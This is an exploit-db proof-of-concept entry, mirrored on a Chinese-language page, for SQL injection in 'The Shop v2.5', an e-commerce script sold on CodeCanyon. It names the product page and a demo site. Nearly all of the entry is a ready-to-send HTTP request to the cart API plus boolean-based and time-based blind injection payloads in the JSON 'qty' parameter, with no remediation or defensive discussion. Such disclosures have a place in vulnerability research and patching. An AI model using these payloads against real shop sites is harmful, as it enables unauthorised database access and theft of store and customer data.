The Shop v2.5 – SQL Injection

  • 作者: Ahmet Ümit BAYRAM
    日期: 2023-06-19
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/51525/
  • # Exploit Title: The Shop v2.5 - SQL Injection
    # Date: 2023-06-17
    # Exploit Author: Ahmet Ümit BAYRAM
    # Vendor: https://codecanyon.net/item/the-shop/34858541
    # Demo Site: https://shop.activeitzone.com
    # Tested on: Kali Linux
    # CVE: N/A
    
    
    ### Request ###
    
    POST /api/v1/carts/add HTTP/1.1
    Content-Type: application/json
    Accept: application/json, text/plain, */*
    x-requested-with: XMLHttpRequest
    x-xsrf-token: xjwxipuDENxaHWGfda1nUZbX1R155JZfHD5ab8L4
    Referer: https://localhost
    Cookie: XSRF-TOKEN=LBhB7u7sgRN4hB3DB3NSgOBMLE2tGDIYWItEeJGL;
    the_shop_session=iGQJNeNlvRFGYZvsVowWUMDJ8nRL2xzPRXhT93h7
    Content-Length: 81
    Accept-Encoding: gzip,deflate,br
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
    (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
    Host: localhost
    Connection: Keep-alive
    
    {"variation_id":"119","qty":"if(now()=sysdate(),sleep(6),0)","temp_user_id":null}
    
    
    ### Parameter & Payloads ###
    
    Parameter: JSON qty ((custom) POST)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: {"variation_id":"119","qty":"(SELECT (CASE WHEN (4420=4420)
    THEN 'if(now()=sysdate(),sleep(6),0)' ELSE (SELECT 3816 UNION SELECT 4495)
    END))","temp_user_id":null}
    
    Type: time-based blind
    Title: MySQL > 5.0.12 OR time-based blind (heavy query)
    Payload: {"variation_id":"119","qty":"if(now()=sysdate(),sleep(6),0) OR
    2614=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A,
    INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS
    C)","temp_user_id":null}